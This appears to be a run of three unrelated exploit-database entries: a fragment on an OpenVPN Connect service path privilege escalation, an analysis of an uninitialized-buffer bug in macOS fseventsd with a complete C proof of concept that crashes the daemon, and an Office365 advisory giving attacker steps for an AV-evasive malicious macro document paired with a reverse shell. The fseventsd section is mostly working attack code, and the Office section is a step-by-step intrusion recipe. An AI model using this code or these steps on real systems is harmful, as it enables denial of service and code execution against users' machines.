C:\>sc qc agent_ovpnconnect
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: agent_ovpnconnect
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files\OpenVPN Connect\agent_ovpnconnect_1559309046710.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : OpenVPN Agent agent_ovpnconnect
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

#Exploit:

A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.

# Exploit Title: Apple macOS 10.15.1 - Denial of Service (PoC)
# Date: 2019-11-02
# Exploit Author: 08Tc3wBB
# Vendor Homepage: Apple
# Software Link:
# Version: Apple macOS < 10.15.1 / iOS < 13.2
# Tested on: Tested on macOS 10.14.6 and iOS 12.4.1
# CVE : N/A
# Type : DOS
# https://support.apple.com/en-us/HT210721

----- Execution file path:
  /System/Library/Frameworks/CoreServices.framework/Versions/A/Frameworks/FSEvents.framework/Versions/A/Support/fseventsd

fseventsd running as root and unsandboxed on both iOS and macOS, and accessible from within the Application sandbox.

----- Analysis

Env: macOS 10.14.6
I named following pseudocode functions to help you understand the execution flow.

void __fastcall routine_1(mach_msg_header_t *msg, mach_msg_header_t *reply) // 0x100001285
{
  ...
  v9 = implementation_register_rpc(
         msg->msgh_local_port,
         msg[1].msgh_size,
         msg[4].msgh_reserved,               
         (unsigned int)msg[4].msgh_id,
         *(_QWORD *)&msg[1].msgh_reserved,      // input_mem1
         msg[2].msgh_size >> 2,                 // input_mem1_len
         *(_QWORD *)&msg[2].msgh_remote_port,   // input_mem2
         msg[2].msgh_id,                        // input_mem2_len
         msg[5].msgh_remote_port,
         *(_QWORD *)&msg[3].msgh_bits,          // input_mem3
         msg[3].msgh_local_port >> 2,           // input_mem3_len
         *(_QWORD *)&msg[3].msgh_reserved,      // input_mem4
         msg[4].msgh_size);                     // input_mem4_len
  ...
}
routine_1 will be executed when user send mach_msg to Mach Service "com.apple.FSEvents" with id 0x101D0

And routine_1 internally invokes a function called fsevent_add_client to process data included in input_mem1/input_mem2

I marked five places with: (1) (2) (3) (4) (5)
These are the essential points cause this vulnerability.

void *fsevent_add_client(...)
{
  ...
  v25 = malloc(8LL * input_mem1_len); // (1) Allocate a new buffer with input_mem1_len, didn't initializing its content.
  *(_QWORD *)(eventobj + 136) = v25; // Subsequently insert that new buffer into (eventobj + 136)
  ...

  v20 = ... // v20 point to an array of strings that was created based on user input

  // The following process is doing recursive parsing to v20

  index = 0LL;
  while ( 1 )
  {
    v26 = *(const char **)(v20 + 8 * index);

    ...

    v28 = strstr(*(const char **)(v20 + 8 * index), "/.docid");
    v27 = v26;
    if ( !v28 ) // (2) If input string doesn't contain "/.docid", stop further parse, go straight to strdup
      goto LABEL_15;

    if ( strcmp(v28, "/.docid") ) // (3) If an input string doesn't exactly match "/.docid", goto LABEL_16
      goto LABEL_16;

    *(_QWORD *)(*(_QWORD *)(eventobj + 136) + 8 * index) = strdup(".docid");

LABEL_17:
    if ( ++index >= input_mem1_len )
      goto LABEL_21;
  }

  v27 = *(const char **)(v20 + 8 * index);
LABEL_15:
  *(_QWORD *)(*(_QWORD *)(eventobj + 136) + 8 * index) = strdup(v27);


LABEL_16:
  if ( *(_QWORD *)(*(_QWORD *)(eventobj + 136) + 8 * index) )
    goto LABEL_17; // (4) So far the new buffer has never been initialized, but if it contain any wild value, it will goto LABEL_17, which program will retain that wild value and go on to parse next input_string
  ...


  // (5) Since all values saved in the new buffer supposed to be the return value of strdup, they will all be free'd later on. So if spray works successfully, the attacker can now has the ability to call free() on any address, further develop it to modify existing memory data.
}

However there is a catch, fseventsd only allow input_mem1_len be 1 unless the requested proc has root privilege, led to the size of uninitialized buffer can only be 8, such small size caused it very volatile, hard to apply desired spray work unless discover something else to assist. Or exploit another system proc (sandboxed it's okay), and borrow their root credential to send the exploit msg.

----- PoC

// clang poc.c -framework CoreFoundation -o poc

#include <stdio.h>
#include <xpc/xpc.h>
#include <CoreFoundation/CoreFoundation.h>
#include <bootstrap.h>

mach_port_t server_port = 0;
mach_port_t get_server_port(){
    if(server_port)
        return server_port;
    bootstrap_look_up(bootstrap_port, "com.apple.FSEvents", &server_port);
    return server_port;
}

int trigger_bug = 0;
int has_reach_limit = 0;
uint32_t call_routine_1(){

    struct SEND_Msg{
        mach_msg_header_t Head;
        mach_msg_body_t msgh_body;
        mach_msg_port_descriptor_t port;
        mach_msg_ool_descriptor_t mem1;
        mach_msg_ool_descriptor_t mem2;
        mach_msg_ool_descriptor_t mem3;
        mach_msg_ool_descriptor_t mem4;
        // Offset to here : +104

        uint64_t unused_field1;
        uint32_t input_num1; // +112
        uint32_t input_num2; // +116
        uint64_t len_auth1; // +120 length of mem1/mem2
        uint32_t input_num3; // +128
        uint64_t len_auth2; // +132 length of mem3/mem4

        char unused_field[20];
    };

    struct RECV_Msg{
        mach_msg_header_t Head; // Size: 24
        mach_msg_body_t msgh_body;
        mach_msg_port_descriptor_t port;
        uint64_t NDR_record;
    };

    struct SEND_Msg *msg = malloc(0x100);
    bzero(msg, 0x100);

    msg->Head.msgh_bits = MACH_MSGH_BITS_COMPLEX|MACH_MSGH_BITS(MACH_MSG_TYPE_COPY_SEND, MACH_MSG_TYPE_MAKE_SEND);
    msg->Head.msgh_size = 160;
    int kkk = get_server_port();
    msg->Head.msgh_remote_port = kkk;
    msg->Head.msgh_local_port = mig_get_reply_port();
    msg->Head.msgh_id = 0x101D0;
    msg->msgh_body.msgh_descriptor_count = 5;

    msg->port.type = MACH_MSG_PORT_DESCRIPTOR;
    msg->mem1.deallocate = false;
    msg->mem1.copy = MACH_MSG_VIRTUAL_COPY;
    msg->mem1.type = MACH_MSG_OOL_DESCRIPTOR;
    memcpy(&msg->mem2, &msg->mem1, sizeof(msg->mem1));
    memcpy(&msg->mem3, &msg->mem1, sizeof(msg->mem1));
    memcpy(&msg->mem4, &msg->mem1, sizeof(msg->mem1));

    mach_port_t port1=0;
    mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &port1);

    msg->port.name = port1;
    msg->port.disposition = MACH_MSG_TYPE_MAKE_SEND;

    uint64_t empty_data = 0;
    if(trigger_bug){

        msg->input_num1 = 5;

        msg->mem1.address = &empty_data;
        msg->mem1.size = 4;
        msg->input_num2 = msg->mem1.size >> 2; // input_mem1_len_auth

        msg->mem2.address = "/.docid1";
        msg->mem2.size = (mach_msg_size_t)strlen(msg->mem2.address) + 1;
    }
    else{
        msg->input_num1 = 1;

        msg->mem1.address = &empty_data;
        msg->mem1.size = 4;
        msg->input_num2 = msg->mem1.size >> 2; // input_mem1_len_auth

        msg->mem2.address = "/.dacid1";
        msg->mem2.size = (mach_msg_size_t)strlen(msg->mem2.address) + 1;
    }

    msg->mem3.address = 0;
    msg->mem3.size = 0;
    msg->input_num3 = msg->mem3.size >> 2; // input_mem3_len_auth

    msg->mem4.address = 0;
    msg->mem4.size = 0;

    msg->len_auth1 = ((uint64_t)msg->mem2.size << 32) | (msg->mem1.size >> 2);
    msg->len_auth2 = ((uint64_t)msg->mem4.size << 32) | (msg->mem3.size >> 2);

    mach_msg((mach_msg_header_t*)msg, MACH_SEND_MSG|(trigger_bug?0:MACH_RCV_MSG), msg->Head.msgh_size, 0x100, msg->Head.msgh_local_port, 0, 0);

    int32_t errCode = *(int32_t*)(((char*)msg) + 0x20);
    if(errCode == -21){
        has_reach_limit = 1;
    }

    mig_dealloc_reply_port(msg->Head.msgh_local_port);
    struct RECV_Msg *recv_msg = (void*)msg;

    uint32_t return_port = recv_msg->port.name;
    free(msg);

    return return_port;
}

int main(int argc, const char * argv[]) {

    printf("PoC started running...\n");

    uint32_t aaa[1000];
    for(int i=0; i<=1000; i++){
        if(has_reach_limit){
            trigger_bug = 1;
            call_routine_1();
            break;
        }
        aaa[i] = call_routine_1();
    }

    printf("Finished\n");
    printf("Check crash file beneath /Library/Logs/DiagnosticReports/\n");

    return 0;
}

# Exploit Title: Microsoft Office365 Remote Code Execution Vulnerability
# Date: 2/11/19
# Exploit Author: Social Engineering Neo - @EngineeringNeo
# Vendor Homepage: https://microsoft.com
# Software Link: https://office.com
# Version: Office365/ProPlus (build 16.0.11727.20222, 16.0.11901.20170, 16.0.11901.20204 & 16.0.11929.202.88)
# Tested on: Windows 10 (build 17763.253, 18362.295 & 18362.356)


Affected Platforms: -
Microsoft Windows ≤10
Office365 & ProPlus Products ≤2019


Tested On: -
Windows 10 (build 17763.253, 18362.295 & 18362.356)
Office365/ProPlus (build 16.0.11727.20222, 16.0.11901.20170, 16.0.11901.20204 & 16.0.11929.202.88)
Most up to-date version of Microsoft Windows & Office365/ProPlus Products are affected.


Base: -
CWE-325 - Missing Required Cryptographic Step.
The software does not implement a required step in a cryptographic algorithm used to validate the original integrity of documents.


Summary: -
Improper Integrity Validation of Office Documents Resulting in Multiple Microsoft Office Products Suffering from a Protection Bypass Vulnerability. Allowing Auto-Execution of Macro Code Inside Macro-Enabled Office Documents.


Short Description: -
Overwriting an original macro-enabled document with a malicious document will bypass the built-in protections.


Long Description: -
A user creates a macro-enabled MS Word document and saves the document with text/data inside.
If the user deletes the document and downloads a completely different document with the same name, this can allow remote code execution.
When a document is opened/edited, Office apps keep a record of the name and permissions associated with the specific document.
This can be abused when downloading a malicious document to run code remotely on the machine.


Proof of Concept: -
=====
Tested on Latest Versions of Access, Excel, InfoPath, OneNote, Outlook, PowerPoint, Project, Publisher, Visio, Word.

Affects Access, Excel, InfoPath, PowerPoint, Visio, Word.
Does not affect OneNote, Outlook, Project, Publisher.

ATTACKER: -
Step 0.) -  Knowledge of Office document names on VICTIM device.
Step 1.) -  Inject malicious VBA macro code & payload into Office document.    *preferably AV evasive*
Step 2.) -  Send malicious macro-enabled document to VICTIM through internet.
Step 3.) -  Setup bind/reverse connection.

VICTIM: -
Step 1.) -  Download document sent by ATTACKER.
Step 2.) -  Open Document in same location as previous document.

[CODE EXECUTION SUCCESSFUL]

VIDEO: -   https://youtu.be/YVF7gqWZSGE
=====


Expected Result: -
It shouldn't be possible to automatically execute macro code on the host machine without user consent or additional configuration.
(Clean Install)


Observed Result: -
Office document auto-executes macro code upon loading document without any user consent, in our case leading to remote code execution.
(User Level Access)